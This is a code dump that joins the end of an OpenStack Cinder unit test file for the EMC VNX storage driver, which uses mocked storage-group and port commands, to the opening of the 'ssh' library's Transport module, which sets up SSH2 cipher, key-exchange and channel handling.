def standard_fake_command_execute(self, *args, **kwargv):
standard_commands = [
self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('vol2'),
self.testData.LUN_PROPERTY_ALL_CMD('vol-vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('snapshot1'),
self.testData.POOL_PROPERTY_CMD]
standard_results = [
self.testData.LUN_PROPERTY('vol1'),
self.testData.LUN_PROPERTY('vol2'),
self.testData.LUN_PROPERTY('vol-vol1'),
self.testData.LUN_PROPERTY('snapshot1'),
self.testData.POOL_PROPERTY]
standard_default = SUCCEED
for i in range(len(standard_commands)):
if args == standard_commands[i]:
return standard_results[i]
return standard_default
def succeed_fake_command_execute(self, *command, **kwargv):
return SUCCEED
def fake_get_pool_properties(self, filter_option, properties=None):
pool_info = {'pool_name': "unit_test_pool0",
'total_capacity_gb': 1000.0,
'free_capacity_gb': 1000.0
}
return pool_info
def fake_get_lun_properties(self, filter_option, properties=None):
lun_info = {'lun_name': "vol1",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
return lun_info
def fake_safe_get(self, value):
if value == "storage_vnx_pool_name":
return "unit_test_pool"
elif 'volume_backend_name' == value:
return "namedbackend"
else:
return None
@mock.patch(
"oslo_concurrency.processutils.execute",
mock.Mock(
return_value=(
"fakeportal iqn.1992-04.fake.com:fake.apm00123907237.a8", 0)))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection_fc_auto_reg(self):
# Test for auto registration
self.configuration.initiator_auto_registration = True
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
data = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(data['data']['access_mode'], 'ro')
expected = [
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-list'),
mock.call('port', '-list', '-sp'),
mock.call('storagegroup', '-gname', 'fakehost',
'-setpath', '-hbauid',
'22:34:56:78:90:12:34:56:12:34:56:78:90:12:34:56',
'-sp', 'A', '-spport', '0', '-ip', '10.0.0.2',
'-host', 'fakehost', '-o'),
mock.call('port', '-list', '-sp'),
mock.call('storagegroup', '-gname', 'fakehost',
'-setpath', '-hbauid',
'22:34:56:78:90:54:32:16:12:34:56:78:90:54:32:16',
'-sp', 'A', '-spport', '0', '-ip', '10.0.0.2',
'-host', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
# Test for manaul registration
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
('', 0),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
data = self.driver.initialize_connection(
self.testData.test_volume_rw,
self.testData.connector)
self.assertEqual(data['data']['access_mode'], 'rw')
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection_fc_auto_zoning(self):
# Test for auto zoning
self.configuration.zoning_mode = 'fabric'
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
('', 0),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
conn_info = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(conn_info['data']['initiator_target_map'],
EMCVNXCLIDriverTestData.i_t_map)
self.assertEqual(conn_info['data']['target_wwn'],
['1122334455667777'])
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call('lun', '-list', '-name', 'vol1',
'-state', '-status', '-opDetails',
'-userCap', '-owner', '-attachedSnapshot'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
def test_terminate_connection_remove_zone_false(self):
self.driver = EMCCLIFCDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {1: 16, 2: 88, 3: 47}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
connection_info = self.driver.terminate_connection(
self.testData.test_volume,
self.testData.connector)
self.assertFalse('initiator_target_map' in connection_info['data'],
'initiator_target_map should not appear.')
cli_helper.remove_hlu_from_storagegroup.assert_called_once_with(
16, self.testData.connector["host"])
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
def test_terminate_connection_remove_zone_true(self):
self.driver = EMCCLIFCDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
connection_info = self.driver.terminate_connection(
self.testData.test_volume,
self.testData.connector)
self.assertTrue('initiator_target_map' in connection_info['data'],
'initiator_target_map should be populated.')
self.assertEqual(connection_info['data']['initiator_target_map'],
EMCVNXCLIDriverTestData.i_t_map)
def test_get_volume_stats(self):
#expect_result = [POOL_PROPERTY]
self.driverSetup()
stats = self.driver.get_volume_stats(True)
self.assertTrue(stats['driver_version'] is not None,
"dirver_version is not returned")
self.assertTrue(
stats['free_capacity_gb'] == 1000.6,
"free_capacity_gb is not correct")
self.assertTrue(
stats['reserved_percentage'] == 0,
"reserved_percentage is not correct")
self.assertTrue(
stats['storage_protocol'] == 'FC',
"storage_protocol is not correct")
self.assertTrue(
stats['total_capacity_gb'] == 10000.5,
"total_capacity_gb is not correct")
self.assertTrue(
stats['vendor_name'] == "EMC",
"vender name is not correct")
self.assertTrue(
stats['volume_backend_name'] == "namedbackend",
"volume backend name is not correct")
self.assertTrue(stats['location_info'] == "unit_test_pool|fakeSerial")
self.assertTrue(
stats['driver_version'] == "04.01.00",
"driver version is incorrect.")
class EMCVNXCLIToggleSPTestData():
def FAKE_COMMAND_PREFIX(self, sp_address):
return ('/opt/Navisphere/bin/naviseccli', '-address', sp_address,
'-user', 'sysadmin', '-password', 'sysadmin',
'-scope', 'global')
class EMCVNXCLIToggleSPTestCase(test.TestCase):
def setUp(self):
super(EMCVNXCLIToggleSPTestCase, self).setUp()
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.configuration = mock.Mock(conf.Configuration)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.10.10.10'
self.configuration.san_secondary_ip = "10.10.10.11"
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
self.configuration.default_timeout = 1
self.configuration.max_luns_per_storage_group = 10
self.configuration.destroy_empty_storage_group = 10
self.configuration.storage_vnx_authentication_type = "global"
self.configuration.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.configuration.zoning_mode = None
self.configuration.storage_vnx_security_file_dir = ""
self.cli_client = emc_vnx_cli.CommandLineHelper(
configuration=self.configuration)
self.test_data = EMCVNXCLIToggleSPTestData()
def tearDown(self):
super(EMCVNXCLIToggleSPTestCase, self).tearDown()
def test_no_sp_toggle(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN, FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.10")
expected = [mock.call(*('ping', '-c', 1, '10.10.10.10'),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
def test_toggle_sp_with_server_unavailabe(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
Error occurred during HTTP request/response from the target: '10.244.213.142'.
Message : HTTP/1.1 503 Service Unavailable"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
def test_toggle_sp_with_end_of_data(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
Error occurred during HTTP request/response from the target: '10.244.213.142'.
Message : End of data stream"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
def test_toggle_sp_with_connection_refused(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
A network error occurred while trying to connect: '10.244.213.142'.
Message : Error occurred because connection refused. \
Unable to establish a secure connection to the Management Server.
"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
|
hguemar/cinder
|
cinder/tests/test_emc_vnxdirect.py
|
Python
|
apache-2.0
| 125,902 | 0.000246 |
# Copyright (C) 2011 Jeff Forcier <jeff@bitprophet.org>
#
# This file is part of ssh.
#
# 'ssh' is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# 'ssh' is distrubuted in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with 'ssh'; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Suite 500, Boston, MA 02110-1335 USA.
"""
L{Transport} handles the core SSH2 protocol.
"""
import os
import socket
import string
import struct
import sys
import threading
import time
import weakref
import ssh
from ssh import util
from ssh.auth_handler import AuthHandler
from ssh.channel import Channel
from ssh.common import *
from ssh.compress import ZlibCompressor, ZlibDecompressor
from ssh.dsskey import DSSKey
from ssh.kex_gex import KexGex
from ssh.kex_group1 import KexGroup1
from ssh.message import Message
from ssh.packet import Packetizer, NeedRekeyException
from ssh.primes import ModulusPack
from ssh.rsakey import RSAKey
from ssh.server import ServerInterface
from ssh.sftp_client import SFTPClient
from ssh.ssh_exception import SSHException, BadAuthenticationType, ChannelException
from ssh.util import retry_on_signal
from Crypto import Random
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
from Crypto.Hash import SHA, MD5
try:
from Crypto.Util import Counter
except ImportError:
from ssh.util import Counter
# for thread cleanup
_active_threads = []
def _join_lingering_threads():
for thr in _active_threads:
thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class SecurityOptions (object):
"""
Simple object containing the security preferences of an ssh transport.
These are tuples of acceptable ciphers, digests, key types, and key
exchange algorithms, listed in order of preference.
Changing the contents and/or order of these fields affects the underlying
L{Transport} (but only if you change them before starting the session).
If you try to add an algorithm that ssh doesn't recognize,
C{ValueError} will be raised. If you try to assign something besides a
tuple to one of the fields, C{TypeError} will be raised.
"""
__slots__ = [ 'ciphers', 'digests', 'key_types', 'kex', 'compression', '_transport' ]
def __init__(self, transport):
self._transport = transport
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
@rtype: str
"""
return '<ssh.SecurityOptions for %s>' % repr(self._transport)
def _get_ciphers(self):
return self._transport._preferred_ciphers
def _get_digests(self):
return self._transport._preferred_macs
def _get_key_types(self):
return self._transport._preferred_keys
def _get_kex(self):
return self._transport._preferred_kex
def _get_compression(self):
return self._transport._preferred_compression
def _set(self, name, orig, x):
if type(x) is list:
x = tuple(x)
if type(x) is not tuple:
raise TypeError('expected tuple or list')
possible = getattr(self._transport, orig).keys()
forbidden = filter(lambda n: n not in possible, x)
if len(forbidden) > 0:
raise ValueError('unknown cipher')
setattr(self._transport, name, x)
def _set_ciphers(self, x):
self._set('_preferred_ciphers', '_cipher_info', x)
def _set_digests(self, x):
self._set('_preferred_macs', '_mac_info', x)
def _set_key_types(self, x):
self._set('_preferred_keys', '_key_info', x)
def _set_kex(self, x):
self._set('_preferred_kex', '_kex_info', x)
def _set_compression(self, x):
self._set('_preferred_compression', '_compression_info', x)
ciphers = property(_get_ciphers, _set_ciphers, None,
"Symmetric encryption ciphers")
digests = property(_get_digests, _set_digests, None,
"Digest (one-way hash) algorithms")
key_types = property(_get_key_types, _set_key_types, None,
"Public-key algorithms")
kex = property(_get_kex, _set_kex, None, "Key exchange algorithms")
compression = property(_get_compression, _set_compression, None,
"Compression algorithms")
class ChannelMap (object):
def __init__(self):
# (id -> Channel)
self._map = weakref.WeakValueDictionary()
self._lock = threading.Lock()
def put(self, chanid, chan):
self._lock.acquire()
try:
self._map[chanid] = chan
finally:
self._lock.release()
def get(self, chanid):
self._lock.acquire()
try:
return self._map.get(chanid, None)
finally:
self._lock.release()
def delete(self, chanid):
self._lock.acquire()
try:
try:
del self._map[chanid]
except KeyError:
pass
finally:
self._lock.release()
def values(self):
self._lock.acquire()
try:
return self._map.values()
finally:
self._lock.release()
def __len__(self):
self._lock.acquire()
try:
return len(self._map)
finally:
self._lock.release()
class Transport (threading.Thread):
"""
An SSH Transport attaches to a stream (usually a socket), negotiates an
encrypted session, authenticates, and then creates stream tunnels, called
L{Channel}s, across the session. Multiple channels can be multiplexed
across a single session (and often are, in the case of port forwardings).
"""
_PROTO_ID = '2.0'
_CLIENT_ID = 'ssh_%s' % (ssh.__version__)
_preferred_ciphers = ( 'aes128-ctr', 'aes256-ctr', 'aes128-cbc', 'blowfish-cbc', 'aes256-cbc', '3des-cbc',
'arcfour128', 'arcfour256' )
_preferred_macs = ( 'hmac-sha1', 'hmac-md5', 'hmac-sha1-96', 'hmac-md5-96' )
_preferred_keys = ( 'ssh-rsa', 'ssh-dss' )
_preferred_kex = ( 'diffie-hellman-group1-sha1', 'diffie-hellman-group-exchange-sha1' )
_preferred_compression = ( 'none', )
_cipher_info = {
'aes128-ctr': { 'class': AES, 'mode': AES.MODE_CTR, 'block-size': 16, 'key-size': 16 },
'aes256-ctr': { 'class': AES, 'mode': AES.MODE_CTR, 'block-size': 16, 'key-size': 32 },
'blowfish-cbc': { 'class': Blowfish, 'mode': Blowfish.MODE_CBC, 'block-size': 8, 'key-size': 16 },
'aes128-cbc': { 'class': AES, 'mode': AES.MODE_CBC, 'block-size': 16, 'key-size': 16 },
'aes256-cbc': { 'class': AES, 'mode': AES.MODE_CBC, 'block-size': 16, 'key-size': 32 },
'3des-cbc': { 'class': DES3, 'mode': DES3.MODE_CBC, 'block-size': 8, 'key-size': 24 },
'arcfour128': { 'class': ARC4, 'mode': None, 'block-size': 8, 'key-size': 16 },
'arcfour256': { 'class': ARC4, 'mode': None, 'block-size': 8, 'key-size': 32 },
}
_mac_info = {
'hmac-sha1': { 'class': SHA, 'size': 20 },
'hmac-sha1-96': { 'class': SHA, 'size': 12 },
'hmac-md5': { 'class': MD5, 'size': 16 },
'hmac-md5-96': { 'class': MD5, 'size': 12 },
}
_key_info = {
'ssh-rsa': RSAKey,
'ssh-dss': DSSKey,
}
_kex_info = {
'diffie-hellman-group1-sha1': KexGroup1,
'diffie-hellman-group-exchange-sha1': KexGex,
}
_compression_info = {
# zlib@openssh.com is just zlib, but only turned on after a successful
# authentication. openssh servers may only offer this type because
# they've had troubles with security holes in zlib in the past.
'zlib@openssh.com': ( ZlibCompressor, ZlibDecompressor ),
'zlib': ( ZlibCompressor, ZlibDecompressor ),
'none': ( None, None ),
}
_modulus_pack = None
def __init__(self, sock):
"""
Create a new SSH session over an existing socket, or socket-like
object. This only creates the Transport object; it doesn't begin the
SSH session yet. Use L{connect} or L{start_client} to begin a client
session, or L{start_server} to begin a server session.
If the object is not actually a socket, it must have the following
methods:
- C{send(str)}: Writes from 1 to C{len(str)} bytes, and
returns an int representing the number of bytes written. Returns
0 or raises C{EOFError} if the stream has been closed.
- C{recv(int)}: Reads from 1 to C{int} bytes and returns them as a
string. Returns 0 or raises C{EOFError} if the stream has been
closed.
- C{close()}: Closes the socket.
- C{settimeout(n)}: Sets a (float) timeout on I/O operations.
For ease of use, you may also pass in an address (as a tuple) or a host
string as the C{sock} argument. (A host string is a hostname with an
optional port (separated by C{":"}) which will be converted into a
tuple of C{(hostname, port)}.) A socket will be connected to this
address and used for communication. Exceptions from the C{socket} call
may be thrown in this case.
@param sock: a socket or socket-like object to create the session over.
@type sock: socket
"""
if isinstance(sock, (str, unicode)):
# convert "host:port" into (host, port)
hl = sock.split(':', 1)
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
reason = 'No suitable address family'
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
if socktype == socket.SOCK_STREAM:
af = family
addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error, e:
reason = str(e)
else:
break
else:
raise SSHException(
'Unable to connect to %s: %s' % (hostname, reason))
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.rng = rng
self.sock = sock
# Python < 2.3 doesn't have the settimeout method - RogerB
try:
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never
# propagated.
self.sock.settimeout(0.1)
except AttributeError:
pass
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = 'SSH-' + self._PROTO_ID + '-' + self._CLIENT_ID
self.remote_version = ''
self.local_cipher = self.remote_cipher = ''
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.active = False
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
self.lock = threading.Lock() # synchronization (always higher level than write_lock)
# tracking open channels
self._channels = ChannelMap()
self.channel_events = { } # (id -> Event)
self.channels_seen = { } # (id -> True)
self._channel_counter = 1
self.window_size = 65536
self.max_packet_size = 34816
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = 'ssh.transport'
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
self.auth_handler = None
self.global_response = None # response Message from an arbitrary global request
self.completion_event = None # user-defined event callbacks
self.banner_timeout = 15 # how long (seconds) to wait for the SSH banner
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = { }
self.server_accepts = [ ]
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = { }
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
@rtype: str
"""
out = '<ssh.Transport at %s' % hex(long(id(self)) & 0xffffffffL)
if not self.active:
out += ' (unconnected)'
else:
if self.local_cipher != '':
out += ' (cipher %s, %d bits)' % (self.local_cipher,
self._cipher_info[self.local_cipher]['key-size'] * 8)
if self.is_authenticated():
out += ' (active; %d open channel(s))' % len(self._channels)
elif self.initial_kex_done:
out += ' (connected; awaiting auth)'
else:
out += ' (connecting)'
out += '>'
return out
def atfork(self):
"""
Terminate this Transport without closing the session. On posix
systems, if a Transport is open during process forking, both parent
and child will share the underlying socket, but only one process can
use the connection (without corrupting the session). Use this method
to clean up a Transport object without disrupting the other process.
@since: 1.5.3
"""
self.sock.close()
self.close()
def get_security_options(self):
"""
Return a L{SecurityOptions} object which can be used to tweak the
encryption algorithms this transport will permit, and the order of
preference for them.
@return: an object that can be used to change the preferred algorithms
for encryption, digest (hash), public key, and key exchange.
@rtype: L{SecurityOptions}
"""
return SecurityOptions(self)
def start_client(self, event=None):
"""
Negotiate a new SSH2 session as a client. This is the first step after
creating a new L{Transport}. A separate thread is created for protocol
negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given C{Event} will
be triggered. On failure, L{is_active} will return C{False}.
(Since 1.4) If C{event} is C{None}, this method will not return until
negotation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, you will usually want to authenticate,
calling L{auth_password <Transport.auth_password>} or
L{auth_publickey <Transport.auth_publickey>}.
@note: L{connect} is a simpler method for connecting as a client.
@note: After calling this method (or L{start_server} or L{connect}),
you should no longer directly read from or write to the original
socket object.
@param event: an event to trigger when negotiation is complete
(optional)
@type event: threading.Event
@raise SSHException: if negotiation fails (and no C{event} was passed
in)
"""
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
Random.atfork()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if event.isSet():
break
def start_server(self, event=None, server=None):
"""
Negotiate a new SSH2 session as a server. This is the first step after
creating a new L{Transport} and setting up your server host key(s). A
separate thread is created for protocol negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given C{Event} will
be triggered. On failure, L{is_active} will return C{False}.
(Since 1.4) If C{event} is C{None}, this method will not return until
negotation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, the client will need to authenticate.
Override the methods
L{get_allowed_auths <ServerInterface.get_allowed_auths>},
L{check_auth_none <ServerInterface.check_auth_none>},
L{check_auth_password <ServerInterface.check_auth_password>}, and
L{check_auth_publickey <ServerInterface.check_auth_publickey>} in the
given C{server} object to control the authentication process.
After a successful authentication, the client should request to open
a channel. Override
L{check_channel_request <ServerInterface.check_channel_request>} in the
given C{server} object to allow channels to be opened.
@note: After calling this method (or L{start_client} or L{connect}),
you should no longer directly read from or write to the original
socket object.
@param event: an event to trigger when negotiation is complete.
@type event: threading.Event
@param server: an object used to perform authentication and create
L{Channel}s.
@type server: L{server.ServerInterface}
@raise SSHException: if negotiation fails (and no C{event} was passed
in)
"""
if server is None:
server = ServerInterface()
self.server_mode = True
self.server_object = server
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if event.isSet():
break
def add_server_key(self, key):
"""
Add a host key to the list of keys used for server mode. When behaving
as a server, the host key is used to sign certain packets during the
SSH2 negotiation, so that the client can trust that we are who we say
we are. Because this is used for signing, the key must contain private
key info, not just the public half. Only one key of each type (RSA or
DSS) is kept.
@param key: the host key to add, usually an L{RSAKey <rsakey.RSAKey>} or
L{DSSKey <dsskey.DSSKey>}.
@type key: L{PKey <pkey.PKey>}
"""
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
"""
Return the active host key, in server mode. After negotiating with the
client, this method will return the negotiated host key. If only one
type of host key was set with L{add_server_key}, that's the only key
that will ever be returned. But in cases where you have set more than
one type of host key (for example, an RSA key and a DSS key), the key
type will be negotiated by the client, and this method will return the
key of the type agreed on. If the host key has not been negotiated
yet, C{None} is returned. In client mode, the behavior is undefined.
@return: host key of the type negotiated by the client, or C{None}.
@rtype: L{PKey <pkey.PKey>}
"""
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
def load_server_moduli(filename=None):
"""
I{(optional)}
Load a file of prime moduli for use in doing group-exchange key
negotiation in server mode. It's a rather obscure option and can be
safely ignored.
In server mode, the remote client may request "group-exchange" key
negotiation, which asks the server to send a random prime number that
fits certain criteria. These primes are pretty difficult to compute,
so they can't be generated on demand. But many systems contain a file
of suitable primes (usually named something like C{/etc/ssh/moduli}).
If you call C{load_server_moduli} and it returns C{True}, then this
file of primes has been loaded and we will support "group-exchange" in
server mode. Otherwise server mode will just claim that it doesn't
support that method of key negotiation.
